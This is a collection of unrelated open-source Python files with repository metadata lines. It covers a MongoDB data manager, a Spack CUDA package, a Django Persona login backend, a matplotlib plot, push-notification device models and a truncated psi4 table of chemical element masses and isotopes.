def define_datatype (self, datatype, model):
self.models[datatype] = model
self.collections[datatype] = MongoCollectionWrapper (datatype, model)
def insert (self, datatype, **kw):
kw['owner'] = auth.user.id
if not kw.has_key ('tags'):
kw['tags'] = []
if not kw.has_key ('public'):
kw['public'] = False
return self.collections[datatype].insert (kw)
def count (self, datatype):
return self.collections[datatype].count ()
def update (self, datatype, entry_id, **kw):
self.collections[datatype].update ({'_id': ObjectId (entry_id)}, {'$set': kw})
def global_load (self, datatype, kw = None):
if not kw:
data = self.collections[datatype].find ({
'public': True
})
else:
query = []
for kw_regex in kw:
query.append ({'name': {'$regex': kw_regex, '$options': 'i'}})
query.append ({'tags': {'$regex': kw_regex, '$options': 'i'}})
data = self.collections[datatype].find ({
'public': True,
'$or': query
})
return data
def local_load (self, datatype, keywords = None):
user = dm.user ()
if not user.has_key (datatype):
user[datatype] = []
mongo.users.update ({'_id': user['_id']}, {'$set': {datatype: []}})
ids = user[datatype]
#data = mongo[datatype].find ({'_id': {'$in': ids}})
data = self.collections[datatype].find ({'_id': {'$in': map (lambda x: ObjectId (x), ids)}})
return data
def load_keyworded (self, datatype, kw):
return self.collections[datatype].find ({'tags': {'$in': kw}})
def get (self, datatype, object_id):
return self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def query (self, datatype, **query):
return self.collections[datatype].find (query)
def owner (self, datatype, object_id):
data = self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def public (self, datatype, object_id, pub_status):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$set': {'public': pub_status}})
def link (self, datatype, object_id):
dm.user ()
mongo.users.update ({'user_id': auth.user.id}, {'$push': {datatype: ObjectId (object_id)}})
#print dm.user ()
def unlink (self, datatype, object_id):
mongo.users.update ({'user_id': auth.user.id}, {'$pull': {datatype: ObjectId (object_id)}})
def delete (self, datatype, **kw):
self.collections[datatype].remove (kw)
def dup (self, datatype, alt_datatype):
self.models[alt_datatype] = self.models[datatype]
self.collections[alt_datatype] = self.collections[datatype]
def get_types (self):
return self.models
def tag (self, datatype, object_id, kw):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$pushAll': {'tags': kw}})
#def __ensure_user (self, user_id):
# if not mongo.users.find_one ({'user_id': user_id}):
# mongo.users.insert ({'user_id': user_id})
#def __ensure_type (self, user_id, datatype):
# if not mongo.users.find_one ({'user_id': user_id,
# datatype: {'$exists': true}
# }):
# mongo.users.update ({'user_id': user_id}, {datatype: []})
def boolean (val):
if isinstance (val, str):
lower = val.lower ()
if lower == 'false':
return False
elif lower == 'f':
return False
elif lower == 'true':
return True
elif lower == 't':
return True
elif isinstance (val, int):
if val == 0:
return False
elif val == 1:
return True
elif isinstance (val, float):
if val == 0.0:
return False
elif val == 1.0:
return True
else:
if val is None:
return False
raise RuntimeError ('Cast to boolean failed: Could not convert ' +
str (val) + ' to a boolean')
def cond_assign (dst, src, key):
if src.has_key (key):
dst[key] = src[key]
class attr_dict (dict):
def __init__ (self, **attr):
dict.__init__ (self, **attr)
def __getattr__ (self, key):
try:
return self[key]
except KeyError:
return None
def default (self, key, default):
if self.has_key (key):
return
else:
self[key] = default
def json (self):
return json.dumps (self)
class DM_Field (attr_dict):
def __init__ (self, name, field_type, **attr):
self.name = name
self.type = field_type
self.lookup_id = 'f_' + self.name
attr_dict.__init__ (self, **attr)
#def __deepcopy__ (self, memo):
# pass
def toField (self):
if self.type == 'table':
return Field (self.lookup_id, 'string', default = None)
kw = {}
cond_assign (kw, self, 'default')
cond_assign (kw, self, 'required')
return Field (self.lookup_id, self.type, **kw)
def display (self):
kw = {}
cond_assign (kw, self, 'title')
cond_assign (kw, self, 'visible')
cond_assign (kw, self, 'text')
if not kw.has_key ('text'):
kw['text'] = self.name
return kw
class DM_TableModel (dict):
def __init__ (self, *fields, **kw):
if kw.has_key ('name'):
self.name = kw['name']
else:
self.name = None
values = []
self.publicList = []
for item in fields:
values.append ((item.name, item))
if not item.private and not item.protected:
self.publicList.append (item)
dict.__init__ (self, values)
def map_key (self, key):
return 'f_' + key
def __deepcopy__ (self, memo):
return DM_TableModel (*self, name = self.name)
def __iter__ (self):
return iter (self.values ())
def append (self, field):
self[field.name] = field
def toFields (self):
return map (lambda item: item.toField (), self.values ())
def public (self):
return self.publicList
dm = DataManager ()
| dotskapes/dotSkapes | models/003_data_manager.py | Python | mit | 10,267 | 0.019382 |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from glob import glob
class Cuda(Package):
"""CUDA is a parallel computing platform and programming model invented
by NVIDIA. It enables dramatic increases in computing performance by
harnessing the power of the graphics processing unit (GPU).
Note: This package does not currently install the drivers necessary
to run CUDA. These will need to be installed manually. See:
https://docs.nvidia.com/cuda/ for details."""
homepage = "https://developer.nvidia.com/cuda-zone"
version('9.2.88', 'dd6e33e10d32a29914b7700c7b3d1ca0', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.2/Prod/local_installers/cuda_9.2.88_396.26_linux")
version('9.1.85', '67a5c3933109507df6b68f80650b4b4a', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.1/Prod/local_installers/cuda_9.1.85_387.26_linux")
version('9.0.176', '7a00187b2ce5c5e350e68882f42dd507', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run")
version('8.0.61', '33e1bd980e91af4e55f3ef835c103f9b', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/Prod2/local_installers/cuda_8.0.61_375.26_linux-run")
version('8.0.44', '6dca912f9b7e2b7569b0074a41713640', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda_8.0.44_linux-run")
version('7.5.18', '4b3bcecf0dfc35928a0898793cf3e4c6', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/7.5/Prod/local_installers/cuda_7.5.18_linux.run")
version('6.5.14', '90b1b8f77313600cc294d9271741f4da', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/6_5/rel/installers/cuda_6.5.14_linux_64.run")
def install(self, spec, prefix):
runfile = glob(join_path(self.stage.path, 'cuda*_linux*'))[0]
chmod = which('chmod')
chmod('+x', runfile)
runfile = which(runfile)
# Note: NVIDIA does not officially support many newer versions of
# compilers. For example, on CentOS 6, you must use GCC 4.4.7 or
# older. See:
# http://docs.nvidia.com/cuda/cuda-installation-guide-linux/#system-requirements
# https://gist.github.com/ax3l/9489132
# for details.
runfile(
'--silent', # disable interactive prompts
'--verbose', # create verbose log file
'--override', # override compiler version checks
'--toolkit', # install CUDA Toolkit
'--toolkitpath=%s' % prefix
)
| tmerrick1/spack | var/spack/repos/builtin/packages/cuda/package.py | Python | lgpl-2.1 | 3,901 | 0.001794 |
# accounts/authentication.py
import requests
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'
class PersonaAuthenticationBackend(object):
def authenticate(self, assertion):
logging.warning('entering authenticate function')
response = requests.post(
PERSONA_VERIFY_URL,
data = {'assertion': assertion, 'audience': settings.DOMAIN}
)
logging.warning('got response from persona')
logging.warning(response.content.decode())
if response.ok and response.json()['status'] == 'okay':
email = response.json()['email']
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return User.objects.create(email=email)
else:
logger.warning(
'Persona says no. Json was: {}'.format(response.json())
)
def get_user(self, email):
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return None
| thomec/tango | accounts/authentication.py | Python | gpl-2.0 | 1,296 | 0.003086 |
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(4)
y = x
t = [1.0,0.9,0.95,1.05]
s = np.array([1.0,0.9,0.95,1.05])*100
plt.scatter(x, y, c=t, s=s, alpha = 0.5)
plt.colorbar()
plt.show()
| jmmauricio/pypstools | dev/colormaps.py | Python | gpl-3.0 | 214 | 0.037383 |
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from .fields import HexIntegerField
from .managers import APNSDeviceManager, GCMDeviceManager
try:
instapush_settings = settings.INSTAPUSH_SETTINGS
except AttributeError:
raise ImproperlyConfigured("Please include instapush settings dictionary "\
"in your django settings")
class BaseDevice(models.Model):
"""
Represents a base device object. This class defines
the generic fields to be used by all device types.
All other device types should inherit from this.
"""
name = models.CharField(_('name'), max_length=255, blank=True, null=True)
active = models.BooleanField(_('active'), default=True)
## as a device can not only be related to a user
## but any other defined models. we let the push
## user decide which model should be the owner
## of a device object. For cases, where a device
## does not have to be related to any model this
## can be left empty and hence blank and null are
## set to True
owner = models.ForeignKey(instapush_settings.get('DEVICE_OWNER_MODEL'),
blank=True, null=True)
created = models.DateTimeField(_('created'), auto_now_add=True)
updated = models.DateTimeField(_('updated'), auto_now=True)
class Meta:
abstract = True
def __unicode__(self):
return self.name or self.device_id or self.registration_id
class GCMDevice(BaseDevice):
"""
Represents an android device
"""
device_id = HexIntegerField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.TextField(_('Registration ID'))
## Set custom manager
objects = GCMDeviceManager()
class Meta:
verbose_name = _('GCM Device')
verbose_name_plural = _('GCM Devices')
def send_message(self, message, **kwargs):
"""
Sends a push notification to this device via GCM
"""
from ..libs.gcm import gcm_send_message
data = kwargs.pop("extra", {})
if message is not None:
data["message"] = message
return gcm_send_message(registration_id=self.registration_id,
data=data, **kwargs)
class APNSDevice(BaseDevice):
"""
Represents an iOS device
"""
device_id = models.UUIField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.CharField(_('Registration ID'), max_length=64,
unique=True)
## Set custom manager
APNSDeviceManager()
class Meta:
verbose_name = _('APNS Device')
verbose_name_plural = _('APNS Devices')
def send_message(self, message, **kwargs):
from ..libs.apns import apns_send_message
return apns_send_message(registration_id=self.registration_id,
alert=message, **kwargs)
| amyth/django-instapush | instapush/models/base.py | Python | mit | 2,928 | 0.006489 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Elemental masses (most common isotope), symbols, and atomic numbers from psi4.
"""
_temp_element = ["GHOST", "HYDROGEN", "HELIUM", "LITHIUM", "BERYLLIUM",
"BORON", "CARBON", "NITROGEN", "OXYGEN", "FLUORINE",
"NEON", "SODIUM", "MAGNESIUM", "ALUMINUM", "SILICON",
"PHOSPHORUS", "SULFUR", "CHLORINE", "ARGON", "POTASSIUM",
"CALCIUM", "SCANDIUM", "TITANIUM", "VANADIUM", "CHROMIUM",
"MANGANESE", "IRON", "COBALT", "NICKEL", "COPPER",
"ZINC", "GALLIUM", "GERMANIUM", "ARSENIC", "SELENIUM",
"BROMINE", "KRYPTON", "RUBIDIUM", "STRONTIUM", "YTTRIUM",
"ZIRCONIUM", "NIOBIUM", "MOLYBDENUM", "TECHNETIUM", "RUTHENIUM",
"RHODIUM", "PALLADIUM", "SILVER", "CADMIUM", "INDIUM",
"TIN", "ANTIMONY", "TELLURIUM", "IODINE", "XENON",
"CESIUM", "BARIUM", "LANTHANUM", "CERIUM", "PRASEODYMIUM",
"NEODYMIUM", "PROMETHIUM", "SAMARIUM", "EUROPIUM", "GADOLINIUM",
"TERBIUM", "DYSPROSIUM", "HOLMIUM", "ERBIUM", "THULIUM",
"YTTERBIUM", "LUTETIUM", "HAFNIUM", "TANTALUM", "TUNGSTEN",
"RHENIUM", "OSMIUM", "IRIDIUM", "PLATINUM", "GOLD",
"MERCURY", "THALLIUM", "LEAD", "BISMUTH", "POLONIUM",
"ASTATINE", "RADON", "FRANCIUM", "RADIUM", "ACTINIUM",
"THORIUM", "PROTACTINIUM", "URANIUM", "NEPTUNIUM", "PLUTONIUM",
"AMERICIUM", "CURIUM", "BERKELIUM", "CALIFORNIUM", "EINSTEINIUM",
"FERMIUM", "MENDELEVIUM", "NOBELIUM", "LAWRENCIUM" "RUTHERFORDIUM",
"DUBNIUM", "SEABORGIUM", "BOHRIUM"]
_temp_symbol = ["X", "H", "HE", "LI", "BE", "B", "C", "N", "O", "F", "NE", "NA", "MG",
"AL", "SI", "P", "S", "CL", "AR", "K", "CA", "SC", "TI", "V", "CR", "MN", "FE", "CO",
"NI", "CU", "ZN", "GA", "GE", "AS", "SE", "BR", "KR", "RB", "SR", "Y", "ZR", "NB",
"MO", "TC", "RU", "RH", "PD", "AG", "CD", "IN", "SN", "SB", "TE", "I", "XE", "CS",
"BA", "LA", "CE", "PR", "ND", "PM", "SM", "EU", "GD", "TB", "DY", "HO", "ER", "TM",
"YB", "LU", "HF", "TA", "W", "RE", "OS", "IR", "PT", "AU", "HG", "TL", "PB", "BI",
"PO", "AT", "RN", "FR", "RA", "AC", "TH", "PA", "U", "NP", "PU", "AM", "CM", "BK",
"CF", "ES", "FM", "MD", "NO", "LR", "RF", "DB", "SG", "BH", "HS", "MT", "DS", "RG",
"UUB", "UUT", "UUQ", "UUP", "UUH", "UUS", "UUO"]
_temp_z = list(range(0, 108))
_temp_mass = [
0., 1.00782503207, 4.00260325415, 7.016004548, 9.012182201, 11.009305406,
12, 14.00307400478, 15.99491461956, 18.998403224, 19.99244017542,
22.98976928087, 23.985041699, 26.981538627, 27.97692653246, 30.973761629,
31.972070999, 34.968852682, 39.96238312251, 38.963706679, 39.962590983,
44.955911909, 47.947946281, 50.943959507, 51.940507472, 54.938045141,
55.934937475, 58.933195048, 57.935342907, 62.929597474, 63.929142222,
68.925573587, 73.921177767, 74.921596478, 79.916521271, 78.918337087,
85.910610729, 84.911789737, 87.905612124, 88.905848295, 89.904704416,
92.906378058, 97.905408169, 98.906254747, 101.904349312, 102.905504292,
105.903485715, 106.90509682, 113.90335854, 114.903878484, 119.902194676,
120.903815686, 129.906224399, 126.904472681, 131.904153457, 132.905451932,
137.905247237, 138.906353267, 139.905438706, 140.907652769, 141.907723297,
144.912749023, 151.919732425, 152.921230339, 157.924103912, 158.925346757,
163.929174751, 164.93032207, 165.930293061, 168.93421325, 173.938862089,
174.940771819, 179.946549953, 180.947995763, 183.950931188, 186.955753109,
191.96148069, 192.96292643, 194.964791134, 196.966568662, 201.970643011,
204.974427541, 207.976652071, 208.980398734, 208.982430435, 210.987496271,
222.017577738, 222.01755173, 228.031070292, 227.027752127, 232.038055325,
231.03588399, 238.050788247, 237.048173444, 242.058742611, 243.06138108,
247.07035354, 247.07030708, 251.079586788, 252.082978512, 257.095104724,
258.098431319, 255.093241131, 260.105504, 263.112547, 255.107398, 259.114500,
262.122892, 263.128558, 265.136151, 281.162061, 272.153615, 283.171792, 283.176451,
285.183698, 287.191186, 292.199786, 291.206564, 293.214670]
_temp_iso_symbol = [
"H", "H1", "H2", "D", "H3", "T", "H4", "H5", "H6", "H7", "HE", "HE3", "HE4",
"HE5", "HE6", "HE7", "HE8", "HE9", "HE10", "LI", "LI3", "LI4", "LI5", "LI6",
"LI7", "LI8", "LI9", "LI10", "LI11", "LI12", "BE", "BE5", "BE6", "BE7", "BE8",
"BE9", "BE10", "BE11", "BE12", "BE13", "BE14", "BE15", "BE16", "B", "B6", "B7",
"B8", "B9", "B10", "B11", "B12", "B13", "B14", "B15", "B16", "B17", "B18", "B19",
"C", "C8", "C9", "C10", "C11", "C12", "C13", "C14", "C15", "C16", "C17", "C18",
"C19", "C20", "C21", "C22", "N", "N10", "N11", "N12", "N13", "N14", "N15", "N16",
"N17", "N18", "N19", "N20", "N21", "N22", "N23", "N24", "N25", "O", "O12", "O13",
"O14", "O15", "O16", "O17", "O18", "O19", "O20", "O21", "O22", "O23", "O24",
"O25", "O26", "O27", "O28", "F", "F14", "F15", "F16", "F17", "F18", "F19", "F20",
"F21", "F22", "F23", "F24", "F25", "F26", "F27", "F28", "F29", "F30", "F31",
"NE", "NE16", "NE17", "NE18", "NE19", "NE20", "NE21", "NE22", "NE23", "NE24",
"NE25", "NE26", "NE27", "NE28", "NE29", "NE30", "NE31", "NE32", "NE33", "NE34",
"NA", "NA18", "NA19", "NA20", "NA21", "NA22", "NA23", "NA24", "NA25", "NA26",
"NA27", "NA28", "NA29", "NA30", "NA31", "NA32", "NA33", "NA34", "NA35", "NA36",
"NA37", "MG", "MG19", "MG20", "MG21", "MG22", "MG23", "MG24", "MG25", "MG26",
"MG27", "MG28", "MG29", "MG30", "MG31", "MG32", "MG33", "MG34", "MG35", "MG36",
"MG37", "MG38", "MG39", "MG40", "AL", "AL21", "AL22", "AL23", "AL24", "AL25",
"AL26", "AL27", "AL28", "AL29", "AL30", "AL31", "AL32", "AL33", "AL34", "AL35",
"AL36", "AL37", "AL38", "AL39", "AL40", "AL41", "AL42", "SI", "SI22", "SI23",
"SI24", "SI25", "SI26", "SI27", "SI28", "SI29", "SI30", "SI31", "SI32", "SI33",
"SI34", "SI35", "SI36", "SI37", "SI38", "SI39", "SI40", "SI41", "SI42", "SI43",
"SI44", "P", "P24", "P25", "P26", "P27", "P28", "P29", "P30", "P31", "P32",
"P33", "P34", "P35", "P36", "P37", "P38", "P39", "P40", "P41", "P42", "P43",
"P44", "P45", "P46", "S", "S26", "S27", "S28", "S29", "S30", "S31", "S32", "S33",
"S34", "S35", "S36", "S37", "S38", "S39", "S40", "S41", "S42", "S43", "S44",
"S45", "S46", "S47", "S48", "S49", "CL", "CL28", "CL29", "CL30", "CL31", "CL32",
"CL33", "CL34", "CL35", "CL36", "CL37", "CL38", "CL39", "CL40", "CL41", "CL42",
"CL43", "CL44", "CL45", "CL46", "CL47", "CL48", "CL49", "CL50", "CL51", "AR",
"AR30", "AR31", "AR32", "AR33", "AR34", "AR35", "AR36", "AR37", "AR38", "AR39",
"AR40", "AR41", "AR42", "AR43", "AR44", "AR45", "AR46", "AR47", "AR48", "AR49",
"AR50", "AR51", "AR52", "AR53", "K", "K32", "K33", "K34", "K35", "K36", "K37",
"K38", "K39", "K40", "K41", "K42", "K43", "K44", "K45", "K46", "K47", "K48",
"K49", "K50", "K51", "K52", "K53", "K54", "K55", "CA", "CA34", "CA35", "CA36",
"CA37", "CA38", "CA39", "CA40", "CA41", "CA42", "CA43", "CA44", "CA45", "CA46",
"CA47", "CA48", "CA49", "CA50", "CA51", "CA52", "CA53", "CA54", "CA55", "CA56",
"CA57", "SC", "SC36", "SC37", "SC38", "SC39", "SC40", "SC41", "SC42", "SC43",
"SC44", "SC45", "SC46", "SC47", "SC48", "SC49", "SC50", "SC51", "SC52", "SC53",
"SC54", "SC55", "SC56", "SC57", "SC58", "SC59", "SC60", "TI", "TI38", "TI39",
"TI40", "TI41", "TI42", "TI43", "TI44", "TI45", "TI46", "TI47", "TI48", "TI49",
"TI50", "TI51", "TI52", "TI53", "TI54", "TI55", "TI56", "TI57", "TI58", "TI59",
"TI60", "TI61", "TI62", "TI63", "V", "V40", "V41", "V42", "V43", "V44", "V45",
"V46", "V47", "V48", "V49", "V50", "V51", "V52", "V53", "V54", "V55", "V56",
"V57", "V58", "V59", "V60", "V61", "V62", "V63", "V64", "V65", "CR", "CR42",
"CR43", "CR44", "CR45", "CR46", "CR47", "CR48", "CR49", "CR50", "CR51", "CR52",
"CR53", "CR54", "CR55", "CR56", "CR57", "CR58", "CR59", "CR60", "CR61", "CR62",
"CR63", "CR64", "CR65", "CR66", "CR67", "MN", "MN44", "MN45", "MN46", "MN47",
"MN48", "MN49", "MN50", "MN51", "MN52", "MN53", "MN54", "MN55", "MN56", "MN57",
"MN58", "MN59", "MN60", "MN61", "MN62", "MN63", "MN64", "MN65", "MN66", "MN67",
"MN68", "MN69", "FE", "FE45", "FE46", "FE47", "FE48", "FE49", "FE50", "FE51",
"FE52", "FE53", "FE54", "FE55", "FE56", "FE57", "FE58", "FE59", "FE60", "FE61",
"FE62", "FE63", "FE64", "FE65", "FE66", "FE67", "FE68", "FE69", "FE70", "FE71",
"FE72", "CO", "CO47", "CO48", "CO49", "CO50", "CO51", "CO52", "CO53", "CO54",
"CO55", "CO56", "CO57", "CO58", "CO59", "CO60", "CO61", "CO62", "CO63", "CO64",
"CO65", "CO66", "CO67", "CO68", "CO69", "CO70", "CO71", "CO72", "CO73", "CO74",
"CO75", "NI", "NI48", "NI49", "NI50", "NI51", "NI52", "NI53", "NI54", "NI55",
"NI56", "NI57", "NI58", "NI59", "NI60", "NI61", "NI62", "NI63", "NI64", "NI65",
"NI66", "NI67", "NI68", "NI69", "NI70", "NI71", "NI72", "NI73", "NI74", "NI75",
"NI76", "NI77", "NI78", "CU", "CU52", "CU53", "CU54", "CU55", "CU56", "CU57",
"CU58", "CU59", "CU60", "CU61", "CU62", "CU63", "CU64", "CU65", "CU66", "CU67",
"CU68", "CU69", "CU70", "CU71", "CU72", "CU73", "CU74", "CU75", "CU76", "CU77",
"CU78", "CU79", "CU80", "ZN", "ZN54", "ZN55", "ZN56", "ZN57", "ZN58", "ZN59",
"ZN60", "ZN61", "ZN62", "ZN63", "ZN64", "ZN65", "ZN66", "ZN67", "ZN68", "ZN69",
"ZN70", "ZN71", "ZN72", "ZN73", "ZN74", "ZN75", "ZN76", "ZN77", "ZN78", "ZN79",
"ZN80", "ZN81", "ZN82", "ZN83", "GA", "GA56", "GA57", "GA58", "GA59", "GA60",
"GA61", "GA62", "GA63", "GA64", "GA65", "GA66", "GA67", "GA68", "GA69", "GA70",
"GA71", "GA72", "GA73", "GA74", "GA75", "GA76", "GA77", "GA78", "GA79", "GA80",
"GA81", "GA82", "GA83", "GA84", "GA85", "GA86", "GE", "GE58", "GE59", "GE60",
"GE61", "GE62", "GE63", "GE64", "GE65", "GE66", "GE67", "GE68", "GE69", "GE70",
"GE71", "GE72", "GE73", "GE74", "GE75", "GE76", "GE77", "GE78", "GE79", "GE80",
"GE81", "GE82", "GE83", "GE84", "GE85", "GE86", "GE87", "GE88", "GE89", "AS",
"AS60", "AS61", "AS62", "AS63", "AS64", "AS65", "AS66", "AS67", "AS68", "AS69",
"AS70", "AS71", "AS72", "AS73", "AS74", "AS75", "AS76", "AS77", "AS78", "AS79",
"AS80", "AS81", "AS82", "AS83", "AS84", "AS85", "AS86", "AS87", "AS88", "AS89",
"AS90", "AS91", "AS92", "SE", "SE65", "SE66", "SE67", "SE68", "SE69", "SE70",
"SE71", "SE72", "SE73", "SE74", "SE75", "SE76", "SE77", "SE78", "SE79", "SE80",
"SE81", "SE82", "SE83", "SE84", "SE85", "SE86", "SE87", "SE88", "SE89", "SE90",
"SE91", "SE92", "SE93", "SE94", "BR", "BR67", "BR68", "BR69", "BR70", "BR71",
"BR72", "BR73", "BR74", "BR75", "BR76", "BR77", "BR78", "BR79", "BR80", "BR81",
"BR82", "BR83", "BR84", "BR85", "BR86", "BR87", "BR88", "BR89", "BR90", "BR91",
"BR92", "BR93", "BR94", "BR95", "BR96", "BR97", "KR", "KR69", "KR70", "KR71",
"KR72", "KR73", "KR74", "KR75", "KR76", "KR77", "KR78", "KR79", "KR80", "KR81",
"KR82", "KR83", "KR84", "KR85", "KR86", "KR87", "KR88", "KR89", "KR90", "KR91",
"KR92", "KR93", "KR94", "KR95", "KR96", "KR97", "KR98", "KR99", "KR100", "RB",
"RB71", "RB72", "RB73", "RB74", "RB75", "RB76", "RB77", "RB78", "RB79", "RB80",
"RB81", "RB82", "RB83", "RB84", "RB85", "RB86", "RB87", "RB88", "RB89", "RB90",
"RB91", "RB92", "RB93", "RB94", "RB95", "RB96", "RB97", "RB98", "RB99",
"RB100", "RB101", "RB102", "SR", "SR73", "SR74", "SR75", "SR76", "SR77",
"SR78", "SR79", "SR80", "SR81", "SR82", "SR83", "SR84", "SR85", "SR86", "SR87",
"SR88", "SR89", "SR90", "SR91", "SR92", "SR93", "SR94", "SR95", "SR96", "SR97",
"SR98", "SR99", "SR100", "SR101", "SR102", "SR103", "SR104", "SR105", "Y",
"Y76", "Y77", "Y78", "Y79", "Y80", "Y81", "Y82", "Y83", "Y84", "Y85", "Y86",
"Y87", "Y88", "Y89", "Y90", "Y91", "Y92", "Y93", "Y94", "Y95", "Y96", "Y97",
"Y98", "Y99", "Y100", "Y101", "Y102", "Y103", "Y104", "Y105", "Y106", "Y107",
"Y108", "ZR", "ZR78", "ZR79", "ZR80", "ZR81", "ZR82", "ZR83", "ZR84", "ZR85",
"ZR86", "ZR87", "ZR88", "ZR89", "ZR90", "ZR91", "ZR92", "ZR93", "ZR94", "ZR95",
"ZR96", "ZR97", "ZR98", "ZR99", "ZR100", "ZR101", "ZR102", "ZR103", "ZR104",
"ZR105", "ZR106", "ZR107", "ZR108", "ZR109", "ZR110", "NB", "NB81", "NB82",
"NB83", "NB84", "NB85", "NB86", "NB87", "NB88", "NB89", "NB90", "NB91", "NB92",
"NB93", "NB94", "NB95", "NB96", "NB97", "NB98", "NB99", "NB100", "NB101",
"NB102", "NB103", "NB104", "NB105", "NB106", "NB107", "NB108", "NB109",
"NB110", "NB111", "NB112", "NB113", "MO", "MO83", "MO84", "MO85", "MO86",
"MO87", "MO88", "MO89", "MO90", "MO91", "MO92", "MO93", "MO94", "MO95", "MO96",
"MO97", "MO98", "MO99", "MO100", "MO101", "MO102", "MO103", "MO104", "MO105",
"MO106", "MO107", "MO108", "MO109", "MO110", "MO111", "MO112", "MO113",
"MO114", "MO115", "TC", "TC85", "TC86", "TC87", "TC88", "TC89", "TC90", "TC91",
"TC92", "TC93", "TC94", "TC95", "TC96", "TC97", "TC98", "TC99", "TC100",
"TC101", "TC102", "TC103", "TC104", "TC105", "TC106", "TC107", "TC108",
"TC109", "TC110", "TC111", "TC112", "TC113", "TC114", "TC115", "TC116",
"TC117", "TC118", "RU", "RU87", "RU88", "RU89", "RU90", "RU91", "RU92", "RU93",
"RU94", "RU95", "RU96", "RU97", "RU98", "RU99", "RU100", "RU101", "RU102",
"RU103", "RU104", "RU105", "RU106", "RU107", "RU108", "RU109", "RU110",
"RU111", "RU112", "RU113", "RU114", "RU115", "RU116", "RU117", "RU118",
"RU119", "RU120", "RH", "RH89", "RH90", "RH91", "RH92", "RH93", "RH94", "RH95",
"RH96", "RH97", "RH98", "RH99", "RH100", "RH101", "RH102", "RH103", "RH104",
"RH105", "RH106", "RH107", "RH108", "RH109", "RH110", "RH111", "RH112",
"RH113", "RH114", "RH115", "RH116", "RH117", "RH118", "RH119", "RH120",
"RH121", "RH122", "PD", "PD91", "PD92", "PD93", "PD94", "PD95", "PD96", "PD97",
"PD98", "PD99", "PD100", "PD101", "PD102", "PD103", "PD104", "PD105", "PD106",
"PD107", "PD108", "PD109", "PD110", "PD111", "PD112", "PD113", "PD114",
"PD115", "PD116", "PD117", "PD118", "PD119", "PD120", "PD121", "PD122",
"PD123", "PD124", "AG", "AG93", "AG94", "AG95", "AG96", "AG97", "AG98", "AG99",
"AG100", "AG101", "AG102", "AG103", "AG104", "AG105", "AG106", "AG107",
"AG108", "AG109", "AG110", "AG111", "AG112", "AG113", "AG114", "AG115",
"AG116", "AG117", "AG118", "AG119", "AG120", "AG121", "AG122", "AG123",
"AG124", "AG125", "AG126", "AG127", "AG128", "AG129", "AG130", "CD", "CD95",
"CD96", "CD97", "CD98", "CD99", "CD100", "CD101", "CD102", "CD103", "CD104",
"CD105", "CD106", "CD107", "CD108", "CD109", "CD110", "CD111", "CD112",
"CD113", "CD114", "CD115", "CD116", "CD117", "CD118", "CD119", "CD120",
"CD121", "CD122", "CD123", "CD124", "CD125", "CD126", "CD127", "CD128",
"CD129", "CD130", "CD131", "CD132", "IN", "IN97", "IN98", "IN99", "IN100",
"IN101", "IN102", "IN103", "IN104", "IN105", "IN106", "IN107", "IN108",
"IN109", "IN110", "IN111", "IN112", "IN113", "IN114", "IN115", "IN116",
"IN117", "IN118", "IN119", "IN120", "IN121", "IN122", "IN123", "IN124",
"IN125", "IN126", "IN127", "IN128", "IN129", "IN130", "IN131", "IN132",
"IN133", "IN134", "IN135", "SN", "SN99", "SN100", "SN101", "SN102", "SN103",
"SN104", "SN105", "SN106", "SN107", "SN108", "SN109", "SN110", "SN111",
"SN112", "SN113", "SN114", "SN115", "SN116", "SN117", "SN118", "SN119",
"SN120", "SN121", "SN122", "SN123", "SN124", "SN125", "SN126", "SN127",
"SN128", "SN129", "SN130", "SN131", "SN132", "SN133", "SN134", "SN135",
"SN136", "SN137", "SB", "SB103", "SB104", "SB105", "SB106", "SB107", "SB108",
